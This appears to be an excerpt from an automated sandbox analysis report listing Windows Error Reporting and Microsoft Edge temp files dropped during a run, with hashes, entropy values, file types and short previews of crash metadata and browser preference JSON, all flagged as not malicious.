                                                                                                                                                                                                                                                                                  Preview:MDMP..a..... ........}Xg........................................2!..........T.......8...........T......................................................................................................................eJ..............Lw......................T............}Xg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER713A.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8620
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.689080304100551
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ/ohSI6YW7Bs74gmfr57vspDM89bZTsVkfBSzm:R6lXJw76YqBs0gmfrFv4ZTsmfBf
                                                                                                                                                                                                                                                                                  MD5:22A216AB67BB1B65BCA4ED329A568919
                                                                                                                                                                                                                                                                                  SHA1:E8BACF5F41CA2DDDF761FBD0E4AB5EB0791BF14C
                                                                                                                                                                                                                                                                                  SHA-256:E976F98E267A08363A7B0B4C17BC65C2AFB50F6B7A537D8B70ABCD3A7CB0C144
                                                                                                                                                                                                                                                                                  SHA-512:C55F3C679A195BCE967DA935E25B523B74110BE7FA13C9921D935DAF87E93D261BD3BC9A8307E0D4D743A79C1E0AFA0CFE914C1F8E288101B431FF12D67BCD5B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.7.6.<./.P.i.

                                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7199.tmp.xml

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4853
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.439923606216681
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zsAJg771I93EWpW8VYsYm8M4Jk5LvM6Fdyq8vU5LvMBFXaMuNFd:uIjfGI7Ed7VcJcjMiWsjMBFX1u3d
                                                                                                                                                                                                                                                                                  MD5:34F0D2E311DCBDAA7E739F655BDF62BF
                                                                                                                                                                                                                                                                                  SHA1:61B7B47FB1081C780CBBD8A8B11A4C1A8E16CBCB
                                                                                                                                                                                                                                                                                  SHA-256:E97081A08709CBEAC6DE2C6525D829BB4DE03C2B205AD6E614DE6C92A653D041
                                                                                                                                                                                                                                                                                  SHA-512:4BE97E3A8D40C68AF3E5B725D342BDC239C1159C50992E59434B48ABDCCA576C7F8E4800FDAEB0087A9B4BE38204C2660810F0B03CACEC68C070331123BC97CE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625485" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1be630de-4792-47e8-9b8f-8603436d519f.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8094
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.801504342613856
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:asNAjszeiRUsDQ9k1R6qRAq1k8SPxVLZ7VTiq:asNAo3BEO1R6q3QxVNZTiq
                                                                                                                                                                                                                                                                                  MD5:361AF16EBFBF3F223DF2813E97D09D78
                                                                                                                                                                                                                                                                                  SHA1:46F629C0D62B55EBD9F2D3EF7013499EA1EA7F8B
                                                                                                                                                                                                                                                                                  SHA-256:549921CCFE22E12E3404683200A85876F4CC0773051F4C140F9E18CE3BCD1BC5
                                                                                                                                                                                                                                                                                  SHA-512:1D8D506E4FB006EEEBBDA87E63A31C997850C646745F8E6C77C18A800E7E9E52F8419C95BF1BD44BA4AC82367462747893F35D34910605AABEE6667CCA865FDF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\36512063-562b-48d8-ba7b-22f472c34ca1.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9437
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.589197043255668
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uugqsNk5hdRfbpq3N16Qih/cIyURLl8Rotoe+2vBA2Vvljxf5hZkNUje4WJk1chJ:u+sNwh7sWViRUdAIxBhaNUOk1iVG+
                                                                                                                                                                                                                                                                                  MD5:951210B24955FAF6711225B56ED89D1D
                                                                                                                                                                                                                                                                                  SHA1:A06D26AE9B4A6BD71B9DC32AD5D7EE870403AF32
                                                                                                                                                                                                                                                                                  SHA-256:90E81CEA78D8C1721F9196F37B1757C384EB042255A19317D55DFCAB1854955C
                                                                                                                                                                                                                                                                                  SHA-512:2E9BC13064648AA78FB2D23999E3C6A0E7331597E545D3C1176684BDDFBEACBD6D259A6F6BB6472E318E728B5719A6E2DC43282C41F3CB126A6385B806806451
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfro

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4ca40c9b-1f43-4433-bb0a-dd1b2005f076.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8325
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.790224075965744
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:fsNwjszeiRUOejIk1y6qRAq1k8SPxVLZ7VTiQ:fsNwo3jkT1y6q3QxVNZTiQ
                                                                                                                                                                                                                                                                                  MD5:1DD347BF7E375ED93FAA9D2120384BA9
                                                                                                                                                                                                                                                                                  SHA1:207043ECC35A227C87F1F2D2424F9246C61E69BA
                                                                                                                                                                                                                                                                                  SHA-256:2963D11A066BA03DB3BA3835761315BF9F32FECDEC61D40E011FE8F7603CDD95
                                                                                                                                                                                                                                                                                  SHA-512:AAAEE7AC23B6103D97DC230EC019BFE400C6B6D33556CC4D7732C664D21D36DBBBC5BF18915B6522DE073346702AC728B0E3D1DA45B173785DFEF42B3A446FA7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\522893ba-ae26-4895-9d01-d40a447fefce.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8411
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.487346471196526
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uugqsNk5hdRfbpq3N16Qih/cIyURLl8Rotoe+2vBA2VvlIk2ZjwSe4WJk1cZwbz0:u+sNwh7sWViRUdA22jIk1OGq
                                                                                                                                                                                                                                                                                  MD5:AB70A63DC9A58570F48C1563229C8D8E
                                                                                                                                                                                                                                                                                  SHA1:29684333C89C9C7FF8085D0731D368100F8A8AD4
                                                                                                                                                                                                                                                                                  SHA-256:0B0F3CD6A46FD04D45B2020427C68364660DC51970C48DBF976B1BA1ABB1B84D
                                                                                                                                                                                                                                                                                  SHA-512:C5C0AF2B51901F589C0976238093F180E516C079CC832350982D6472F88AAA99F0E9DFE239586D1483251B3647CAC0456300E44D53F1F58E86A0A09B8B706BCA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfro

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6b737326-9e4a-4a6c-b906-a2e8757d7edf.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8243
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7962904755097036
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:fsNAjszeiRUdejIk1y6qRAq1k8SPxVLZ7VTiQ:fsNAo3WkT1y6q3QxVNZTiQ
                                                                                                                                                                                                                                                                                  MD5:FFBA575C79F0A715D10589C0313AED54
                                                                                                                                                                                                                                                                                  SHA1:E9C8040D34B03A847BC1576C2D5F1733DD2E9D8F
                                                                                                                                                                                                                                                                                  SHA-256:1EF301B9DDE9872F7D34FF689051CB1D73541E278DCD9EA10E9410692B3C9FD1
                                                                                                                                                                                                                                                                                  SHA-512:6DD34E7F1553043A4ED18B2D05484B55DF450C8802DA6E43B4D0945BDEF4B3BF98377DC3CF1FF82E5F22C1F9FE3936116905CA4C7AD88779B9712150D160EFA8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Ve

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6c76c44d-b31d-48c4-9193-b760a529e6ca.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):25075
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.029577434041161
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:eMkbJrT8IeQc5/19wibvNfT1tKoAOY1NiM:eMk1rT8Hn1lK1NiM
                                                                                                                                                                                                                                                                                  MD5:5222345C92F42225DFF11904EFB9EFB6
                                                                                                                                                                                                                                                                                  SHA1:2586291C41985A8DD7B09B0C6F14A6B29379A986
                                                                                                                                                                                                                                                                                  SHA-256:18B063754659EEECEB01ADD16AB095F1C21956F811220538E00E7AB28CFC1A3C
                                                                                                                                                                                                                                                                                  SHA-512:C32F492287F3074A63DD207FECC16FA5E95FB0530413D2852B0EDE570763F48E79D24D26069C7D9C02B95467687DBCC31575F5CF4237D28D5615B343AE627D39
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7205edad-dfc1-4ee9-b20f-7ad873cd7c3e.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9425
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.579639064610539
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uugqsNk5hdRfbpq3N16Qih/cIyURLl8Rotoe+2vBA2Vvljxf5hZkHy+e4WJk1cc2:u+sNwh7sWViRUdAIxBhaHyPk1UVG+
                                                                                                                                                                                                                                                                                  MD5:1BFF5EFB26CFB5BB603EFF4B1537B865
                                                                                                                                                                                                                                                                                  SHA1:53B7BCF80820A9243D4C87602D8E3BC20963D4CD
                                                                                                                                                                                                                                                                                  SHA-256:13DACE0E00870072708E35FF049CC767BD94F05CC442AC6B12DC5DEAA92189AC
                                                                                                                                                                                                                                                                                  SHA-512:0976F2B1EE3DCEDC9F310666BD81C152EC0F027195A821F7FEF413DED049BAFB0A76DC9B3ABB6798315045DD098EE4C99EE3E72AEC2AB41BDB8CCCF9FF9F79B8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfro

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\78306ab5-5aad-4236-bed0-da6e85c3d11b.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):25126
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.028741197222406
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:eMkbJrT8IeQc5/k9wibvNnT1tKoAOY1NiM:eMk1rT8HnkBK1NiM
                                                                                                                                                                                                                                                                                  MD5:35558485374BEA3357033F2D6997E7CF
                                                                                                                                                                                                                                                                                  SHA1:F7D47366454233D6F1F4F882C9720C7605A959AD
                                                                                                                                                                                                                                                                                  SHA-256:B233697A049EE89F9D0CD5E3F0EC6DE5E2B52003AE0BA8FF15F45F095FF3352D
                                                                                                                                                                                                                                                                                  SHA-512:DEDDC94482288FE0B21ADC7C328260CD9752EA75184BB69018FEB168F4E6732A533CE81F41418D1450F30D841F40722C67538B3B74FDF163C31358A8E75DE3CB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7f11e012-82fa-4923-87c2-2f0371ec1293.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):25075
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.029552373515792
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:eMkbJrT8IeQc5/19wibvNnT1tKoAOY1NiM:eMk1rT8Hn1BK1NiM
                                                                                                                                                                                                                                                                                  MD5:70596728571390726A1FD55C39930F53
                                                                                                                                                                                                                                                                                  SHA1:7C6F1BB9B71A39E7DFFAE674C86366B6139095F1
                                                                                                                                                                                                                                                                                  SHA-256:6D20CA003AC0C4D0994123F1D96DB27EE81708ACB39008C56FF4B893AE2F558C
                                                                                                                                                                                                                                                                                  SHA-512:C8114B7F1459068F89DB4C698D2FAB7181045BA775858B737C66D380051EECE314887EC7ECCDF8E19C3A7649092187D53BC6CD44381AFDB6FE28418268F4AD39
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\63c18f15-cb26-49d9-b4fb-f4efdde99c79.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                  MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                  SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                  SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
